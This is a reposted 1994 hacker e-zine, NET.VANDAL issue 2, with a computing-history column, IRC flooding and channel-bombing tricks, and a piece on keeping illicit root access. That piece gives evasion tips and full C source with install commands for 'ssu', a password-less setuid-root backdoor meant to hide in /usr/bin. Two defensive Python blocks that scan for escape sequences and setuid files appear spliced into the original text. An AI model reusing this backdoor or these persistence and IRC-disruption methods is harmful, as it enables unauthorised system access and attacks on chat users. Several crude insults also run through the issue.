
Net Vandal 2

Published in 
Net Vandal
 · 26 Apr 2019

       \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 
*VOL:1* NUMBER 2, Oct. 29, 1994 ALL WRONGS DESERVED TORONTO
///////////////////////////////////////////////////////////////////

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL//

\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\
///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL//

\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\
///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL//

\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\
///////////////////////////////////////////////////////////////////

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
///// An Exercise in Irritainment and Technological Pranking /////

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
NET.VANDAL vol 1, number 2


\\\\\\\\\\\\\\\\\\\\\\\\\\
Brought to you by: The Most Reverend Lucifer Messiah


CONTENTS
ontent
nten
..


* F E A T U R E *
Where Have We Been?
- The Most Reverend Father Looks at the Last 10 Years In Computing.


* G O S S I P - R U M O U R - F E E D B A C K *
- Spelling Bees, Heroics, IRC tricks


* C A B A L T R I C K S *
More cool IRC tricks
- Channel Bombing and Flooding


* S P O R T S *
Identity Crisis
- Securing Illicit Root Accesses


" I have nightmares when I'm asleep, too. "



\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
* F E A T U R E *
Where Have We Been?
- The Most Reverend Father Looks at the Last 10 Years In Computing.


I keep copies of all the computer magazines I've ever bought, or received by
subscription. Trying really hard not to date myself, I came across a copy
of the August 1985 issue of CAD/CAM & Robotics [1] magazine, which
immediately caught my attention.


The original idea behind this article was to poke a laughing finger at
technology, while musing at how far we have come. I was in for a rude
awakening, which has changed my view entirely. The title of this column was
originally intended to invoke a somewhat nostalgic air in the reader.
Now, I am shrugging shoulders, looking at my PC, and saying, "My gawd, where
have we been?"


The advertisement on the inner cover really got me distressed. In it
is pictured a wire-frame drawing of something, god knows what, displayed on
what had to be nothing less than Super-VGA graphics, on a computer with a
base-footprint about the same size around as most desktop cases, but half the
height, with one 5 3/4 inch floppy drive, a mouse, and the most wicked
looking keyboard I've ever seen.


First off, in 1985 we were stuck with CGA graphics, not this incredibly
fine-detailed stuff. So I read the advertisement. Here is how it went:


---
From the experts in interactive graphics -
The Professional's Workstation
The InterPro 32 from Intergraph... the multi-tasking,
multi-functional workstation for today's professional


A personal Computing Resource
Powerful processors - including the 32-bit NSC 32032 - and extensive memory
equip the InterPro 32 as a standalone computing resource under UNIX System V
and PC-DOS. With no hidden processor under your desk.


A distributed processing resource
For access to distributed corporate computing resources, we built the
InterPro 32 with industry-standard networking - Intergraph's ISO 802.3
(Ethernet) architecture - and terminal emulation - the InterPro 32 serves as
an Intergraph graphics workstation linked to a VAX or MicroVAX, a VT100 and
VT220, Tektronix 4105, and (via a gateway) IBM 327x.


Plus interactive color graphics
Even more, the InterPro 32 features high-resolution, interactive color
graphics...graphics backed by Intergraph's years of technological
leadership. With a palette of 4096 for the image clarity and impact that
only color can give.


The InterPro 32 - a multi-functional professional workstation.


INTERGRAPH
Intergraph Systems Ltd


[address, etc] [2]
---

Honestly! This is not a circa-1993 IBM advertisement! This ad is 9 years
old.


Now, in 1985, I thought I had a pretty hot machine. In fact, most of my
friends thought I had a pretty hot machine. It was a brand new 8086 XT,
blazing at 4.77 Mega-hurts (They hadn't reached 8Mhz yet), and running a
CGA, which was the newest in graphics crazes. And it ran PC-DOS. The case
was absolutely humoungous, and weighed more than I care to guestimate. It
also had a single floppy drive, and a massive 20 Megabyte hard drive. I was
often caught laughing at the fact that a lot of major companies were still
using the 3M CBC System (Communicate By Card).


What is this system, same year, same operating system, but with a 32-bit
processor, multitasking, 4096 colours on the graphics (CGA has 4), and all
those other options and buzzwords that have only just hit us IBM'ers
recently?


In fact, curiosity forced me to go through the magazine page by page, ad by
ad, to figure out what the resolution of that monitor actually was.


One possible answer was on the last page. Tektronix had a monitor, 4096
colours. The resolution: 1280x1024 at 60Hz, non-interlaced! WHAT????
Folks... there is something seriously wrong with this iNTEL thing.


We thought we had problems when Microsoft got in caca for violating
copyrights, so they had to change things, and remove a few options from
their disk stacker. Because of this, the change from DOS 6.00 through to
6.2 was a DOWNgrade. Hardly progress.


We thought we had problems when iNTEL released the 80286. The new options
in this machine were so unpopular, iNTEL quickly released the 80386, saying
that it was what they were trying to do in the first place. The 80286? Try
selling one nowadays. Hardly progress indeed!


The 80386 sounds not too much more advanced than the 32032 machine mentioned
in the ad. Why did it take this long for iNTEL to catch up? In fact, it
took about this long for graphics resolutions like the monitor in the ad, to
appear for it.


Then iNTEL released the 80486. To this day, there is no software that
requires an 80486+ machine. The only benefit seems to be in speed. It was
an advancement, just not very much.


And the Pentium is a very hot chip indeed, in more ways than one. Prone to
overheating, and just as expensive as a lower end mini-mainframe. The only
thing it does seem to add to the market is yet more speed, because the new
opcode list doesn't really show much of an improvement. CPUID is
virtually useless, unless you expect that you want to keep upgrading with
iNTEL beyond the Pentium. Since no software demands a minimum of a 486 yet,
I doubt that there will be one that will require a Pentium.


But the Pentium really was a step in the right direction. It has 64 bit
buses, a humoungo prefetch queue, a killer internal code bus, and lots of
other hardware enhancements well beyond the 80486, and above the 32032
mentioned in the ad above. In hardware detail, the system is excellent.


But then again, this is now 9 years after the 32032. It is still a curious
fact that the 80x86 series took 9 years to break Intergraph's 32-bit
barrier. I'd be more inclined to buy the mini-mainframe.


Unfortunately, I don't know what the most recent descendant to the 32032 is.
But I have a feeling it is a whole new article unto itself.


[1] Published by Kerrwil Publications. Unknown if it still exists.


[2] Editor promises to never quote an entire advertisement again. <g>
//////////////////////////////////////////////////////////////////////////////


* G O S S I P - R U M O U R - F E E D B A C K *


Gads. Someone told me that my spelling sucks, and suggests that I do
something about it. Considering Linux has 2 spell checkers online, I'm not
sure why I haven't bothered to ever use them. So look forward to better
spelling, I gess.


To the dude who forged a letter just to ask me if I thought I was some kind
of hero: as a matter of fact, I _do_ think I'm better than other people. My
psychiatrist assures me that I have an admirable contact with reality. I
mean, I would never say that I'm better than I really am. That would be
impossible anyway.


[I'm still trying to figure out why you said that. Your mother has always
delighted in telling new navy recruits and submissive Bay-streeters how
stupid you are, so you're obviously not trying to prove anything.]


Sharkboy, thanks for the encouragement, and comments on my IRC article.
This issue's CABAL TRICKS should keep you busy. There is a good chance that
we will publish a few more IRC columns in the future.



\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
* C A B A L T R I C K S *


More cool IRC tricks
- Channel Bombing and Flooding


When one considers the vast number of machines being synchronized with each
other to suffer the load of a chat system as large and as far reaching as the
Internet Relay Chat, it is a marvel that things do not become more spasmodic
and erratic than they already do.


The object of this issue's Cabal Tricks is to present a few ideas, and to
demonstrate ways in which the irc can be pushed into a state of chaos.


Flooding:
--------
Anyone who has ever used irc is well acquainted with the occasional lag, and
the continuous net splits. Both of these are symptoms of a site becoming
more and more out of sync with the others on the net. Lagging is caused
by a certain degree of out-of-sync'edness. Lags are virtually harmless,
but terribly annoying, since messages take so long to get to and from users
on that client. A net split occurs when the site is so far behind that the
irc client running on it must reset itself to catch back up with the other
systems.


This resetting action occurs in response to two conditions. The first is
the one outlined above; the second is when too much information is forced
through to be processed by the irc client. When this happens, it is called
flooding.


On many sites, piping in a large text file is enough to cause a flood.
Although it works, it isn't very creative. As well, on the sites that it
doesn't work, flood detection will usually reset the log source first (that
source being you).


There are many more interesting ways to do it, which will not set off the
flood detection on your end, but will usually knock off the other people.
Even if it doesn't, you can delight in watching them fume about system speed
problems, or annoying screen activity.


The included script contains the following flood commands, plus several
more:


/tsunami The original tsunami flood that all the irc MOTDs warn you
against.
/sedflood Floods a user with [ENCRYPTED MESSAGE] tokens.


A NET.VANDAL reader also suggested a simple command which seems to slow down
the channel incredibly if there are lots of people using it. The command is:


/ping *


It is especially effective if executed several times one right after the
other. It manages to avoid flooding, but there is a noticeable choppiness
(lag) with irc in that channel.


Bombing:
-------
In my never-too-humble opinion, bombing is much more interesting than
flooding, in any regard. Because of their nature, often not everyone on the
channel is affected by channel bombing. It is still interesting to watch
when half the channel start bitching and logging off en masse, while the
other half sits there wondering what happened.


I would like to thank Vassago for Gargoyle, which was heavily relied upon to
make this script. And to TSP, a 13 year old pseudo-hacker who easily proves
that when Anton LaVey said, "There is no mind more genuinely evil than that
of a child", he wasn't kidding, for bringing me these irc scripts and a few
new ideas.


The bomb abuses the fact that channel keys can contain control characters.
That is to say, characters created by pressing a key with the <ctrl> key
pushed down as well. These characters usually appear as a bolded capital
version of the letter that you pressed, or as some other bolded symbol.


For instance, <ctrl>+b would look like a bright 'B'.


This makes it possible to create various annoying escape sequences, which
will be interpreted as VT100 or ANSI codes to do other things.
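
Added example, not part of the original issue: the defensive counterpart in a
client or log viewer is to make every control character in server-supplied
text (channel keys included) visible before it reaches the terminal, so that
no VT100/ANSI sequence is ever interpreted. The function names and the sample
lines are constructed for illustration.

```python
import re

# ESC-introduced sequences: CSI (ESC [ params final), OSC (ESC ] ... BEL/ST),
# and two-character ESC sequences. The 8-bit CSI byte 0x9b is covered as well.
ESCAPE_SEQ = re.compile(
    r"(?:\x1b\[|\x9b)[0-?]*[ -/]*[@-~]"
    r"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"
    r"|\x1b[ -~]"
)
# C0 controls, DEL and C1 controls: everything a terminal may act upon.
CONTROL = re.compile(r"[\x00-\x1f\x7f-\x9f]")


def _visible(match):
    """Caret notation for C0 and DEL (ESC becomes ^[), \\xNN for C1 bytes."""
    code = ord(match.group())
    if code < 0x20:
        return "^" + chr(code + 0x40)
    if code == 0x7F:
        return "^?"
    return "\\x%02x" % code


def neutralize(text):
    """Return text in which no character can start a terminal command."""
    return CONTROL.sub(_visible, text)


def find_escape_sequences(text):
    """List the terminal sequences present, neutralized so they can be logged."""
    return [neutralize(m.group()) for m in ESCAPE_SEQ.finditer(text)]


def render_irc_line(raw):
    """Decode one raw IRC line and return (safe_text, sequences_found).

    IRC carries no charset, so latin-1 is used: it maps every byte to one
    code point and never raises, which keeps 0x80-0x9f visible to the filter.
    """
    text = raw.rstrip(b"\r\n").decode("latin-1")
    return neutralize(text), find_escape_sequences(text)


# Constructed sample lines (not captured traffic): a channel key carrying SGR
# colour sequences, an 8-bit CSI inside a message, and an ordinary message.
SAMPLES = [
    b":a!u@h MODE #chan +k \x1b[5;31mFIRE\x1b[0m\r\n",
    b":a!u@h PRIVMSG #chan :hi \x9b1mthere\r\n",
    b":a!u@h PRIVMSG #chan :plain text\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        safe, found = render_irc_line(raw)
        print(safe, "<-", found if found else "clean")
```

This also neutralizes the ordinary IRC formatting characters such as <ctrl>+b; a client that wants bold text has to render those itself rather than pass them through.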


The script included in the uuencoded file contains several bombs. Here is a
list of some of the bombs, and what they do:


/bdie logs channel users off of irc
/bsz constantly invokes auto-zmodem on DOS and Windoze users
/bblack makes the screen turn black
/bfire prints a blinking red FIRE!!! on the status bar


Here is the script. To use it, uudecode it (uuencoding it keeps the
control characters from being altered while shipping NET.VANDAL). Then use
gunzip to uncompress trick.gz. When you are in irc, type:


/load tricks


After, you may type /tricks to get a list of the irc tricks available.
There are a few undocumented tricks, as well. (hint: One of these
undocumented tricks is set off when someone tries to ping you).


There is so much more that you can do with these. But I have only planted
the seed. Please, if you come up with any good ideas to follow this up
with, post them to the list, by mailing to net.van...@hack.pcscav.com.


Enjoy.



--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---

--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
//////////////////////////////////////////////////////////////////////////////


* S P O R T S *


Identity Crisis
- Securing Illicit Root Accesses


Getting root access on a system is tough enough, but what about keeping that
access once you've gotten it?


After you have successfully cracked root access on a system, it is pretty
well mandatory that you get in and out of there as quick as possible, to
avoid detection by the system administrator. The easiest way is to run as
root from another account.


There are at least two good methods if you don't already have your own
account on the system. Either way, it is probably a good idea to NOT use
your own account if you do have one there.


The first one is to also crack a rarely-used account, or the account of
someone new to Unix. They usually won't notice any changes to their home
directory, and disregard the "Last login ..." message. Creating a directory
with a '.' as the first character will keep it invisible enough to the real
owner of the account. The following file names are rather good form:


~/.tinrc/.tinrc
~/.emacs/.temp


You can likely do your work in these directories without ever getting
caught, even if you store stuff there.


The second way is to set up your own account. (You have root, remember).
Use whichever method at your own discretion. On a large system, this
method is probably best. On a smaller system, forget it. Use someone
else's account.


From that account, you are free to run 'su' and login as root. This way,
'who' doesn't report that root is logged in somewhere that it shouldn't be.


This still leaves one problem. If the system administrator changes the root
password, which according to Murphy's Law, he will, you are back where you
started from.


This is where 'ssu' comes in. 'ssu' is a small program (compiled under linux
it is 9220 bytes) which runs a program suid as 'root'. The benefit to this
over 'su' is that it never asks for a password. If the root password is
ever changed, it won't matter.


Running 'ssu bash' will give you a root shell, but won't report it as
such to anybody. Here is the output of 'w' as reported to the user (in this
case, cboyd):


---
bash# w
8:12pm up 127 days, 4:39, 2 users, load average: 0.00, 0.01, 0.00
User tty from login@ idle JCPU PCPU what
root tty1 5:19pm 2 -bash
cboyd ttyS5 7:42pm -
bash#
bash# whoami
root
bash#
---


The fun is in the reply to the 'whoami' command. Oddly enough, 'who am i'
tells the truth, outputting this:


---
bash# who am i
cinema!cboyd ttyS5 Oct 24 19:42
bash#
---


This is no cause for concern though. Here is the output of 'w' as root sees
it:


---
root:/tmp# w
8:13pm up 127 days, 4:40, 2 users, load average: 0.00, 0.01, 0.00
User tty from login@ idle JCPU PCPU what
root tty1 5:19pm 1 1 -w
cboyd ttyS5 7:42pm -
---


Even if root runs 'w -u cboyd', he will only see that you are running
'bash'.


Something else to keep in mind. The UID and GID of ssu will determine which
user you will become. Of course, our example makes you root, but I could
very easily have made it cboyd, and then hidden the file somewhere. Doing
this would give any user who executes ssu access to cboyd's home directory,
amongst other things.


Because of its innocuous sounding name, you could probably install the
program in the /usr/bin directory, which usually contains more executable
files than any other directory on the disk, without it ever being noticed.
This way, if you lose the account you were using, you can use another one,
and still have the same access.
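
Added example, not part of the original issue: a setuid file in a crowded
directory goes unnoticed only where nobody compares privileged files against a
known-good list. The code below records a baseline of setuid/setgid files and
reports anything new, changed or missing; it does not filter on owner, so a
file that is setuid to an ordinary user is reported as well. The function
names and the temporary demo tree are constructed for illustration.

```python
import hashlib
import os
import stat
import tempfile


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def find_privileged(root):
    """Yield every regular file under root with the setuid or setgid bit."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path


def make_baseline(root):
    """Record {path: sha256} for the privileged files of a known-good system."""
    return {path: sha256_of(path) for path in find_privileged(root)}


def audit(root, baseline):
    """Return sorted (path, reason) differences from the baseline.

    'new'     setuid/setgid file that the baseline does not list
    'changed' listed file whose content hash differs
    'missing' listed file that is gone or no longer carries the bit
    """
    current = set(find_privileged(root))
    findings = [(p, "new") for p in current if p not in baseline]
    findings += [(p, "changed") for p in current
                 if p in baseline and sha256_of(p) != baseline[p]]
    findings += [(p, "missing") for p in baseline if p not in current]
    return sorted(findings)


def demo():
    """Constructed tree: take a baseline, then add and alter setuid files."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "usr", "bin")
        os.makedirs(bindir)

        def put(name, mode, data):
            path = os.path.join(bindir, name)
            with open(path, "wb") as fh:
                fh.write(data)
            os.chmod(path, mode)
        put("passwd", 0o4755, b"stand-in for a legitimate setuid tool")
        put("ls", 0o0755, b"ordinary binary")
        baseline = make_baseline(root)
        put("ssu", 0o4755, b"stand-in for an unexpected setuid file")
        put("passwd", 0o4755, b"replaced content")
        return [(os.path.relpath(p, root), why) for p, why in audit(root, baseline)]


if __name__ == "__main__":
    for path, why in demo():
        print(why, path)
```

The baseline has to be taken from a known-good install and stored off the host, since anyone with root can rewrite a baseline kept on the same disk.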


Remember to exit the 'su' shell as soon as you are done compiling and
installing 'ssu'. There is no need to add unnecessary risk to what you
are doing.


Here is the source code. Put the following into a file called ssu.c and
follow the instructions contained in the code.



--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
/*****************************************************************************


The Secret Super User
---------------------
Brought to you by: The Most Reverend Father Lucifer Messiah


USAGE: ssu <file to execute as root>


INSTALLATION:


Do the following as root or suid as root:


cc ssu.c -o ssu
strip ssu
chown root.bin ssu
chmod 4755 ssu
mv ssu /usr/bin


******************************************************************************/



#include <stdio.h>


main (argc,argv)
int argc;
char **argv;


{
int gid;
int egid;
int uid,i;
char execute[1000];
gid = getgid();
uid = geteuid();
setuid(uid);
egid = getegid();
setregid(egid);


for(i=1;i<argc;i++){
strcat (execute," ");
strcat(execute,argv[i]);
}
system(execute);
exit (1);


}


--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
End Issue


\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Addendum:
Kids must be the most worthless thing in the world. Why else would poor
people have so many of them?


Personal mail to:
luci...@csis.pcscav.com
all wrongs deserved, granted "post-everywhere" status by the teenage buddha.
//////////////////////////////////////////////////////////////////////////////


\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
//////////////////////////////////////////////////////////////////////////////


<<<<<<<<<<===NET.VANDAL===>>>>>>>>>>
will appear whenever I get to it
(good forgeries are welcomed)

How do I JOIN NET.VANDAL?
************************
Join the list at any time by sending a "SUBSCRIBE NET.VANDAL"
command in the body of a message to net.vandal-requ...@hack.pcscav.com


How do I LEAVE NET.VANDAL?
*************************
Leave the list at any time by sending an "UNSUBSCRIBE NET.VANDAL"
command in the body of a message to net.vandal-requ...@hack.pcscav.com


How do I SUBMIT INFO to NET.VANDAL?
**********************************
Send your articles addressed to net.van...@hack.pcscav.com



<<<<<<<<<<===NET.VANDAL===>>>>>>>>>>
--
The Most Reverend Father Lucifer Messiah
"If you act like a dumbshit, Subscribe to NET.VANDAL
they'll treat you as an equal"
Send "SUBSCRIBE" to:
- J.R. "Bob" Dobbs net.van...@hack.pcscav.com


--- Internet Message Header Follows ---
Xref: netcomsv ont.general:14235 tor.general:9690 alt.net.scandal:222
alt.zines:6494 alt.journalism:7876 alt.insults.gangbang:101 can.general:23971
alt.usenet.kooks:10446 alt.activism:76536 alt.2600:29922 alt.news-media:11462
Newsgroups: ont.general, tor.general, alt.net.scandal, alt.zines,
alt.journalism, alt.insults.gangbang,can.general,alt.usenet.kooks,
alt.activism,alt.2600,alt.news-media
Path: netcomsv!netcomsv!decwrl!lll-winken.llnl.gov!uwm.edu!cs.utexas.edu!
utnut!utzoo!utdoe!io.org!reptiles.org!geac!gts!lethe!uunorth!csis!lucifer
From: luci...@csis.pcscav.com (Lucifer Messiah)
Subject: NET.VANDAL: VOLUME 1 ISSUE 2

Message-ID: <1994Oct29.071234.6...@csis.pcscav.com>
Organization: More like Disorganization
Date: Sat, 29 Oct 1994 07:12:34 GMT
X-Newsreader: TIN [version 1.2 PL2]
Lines: 553
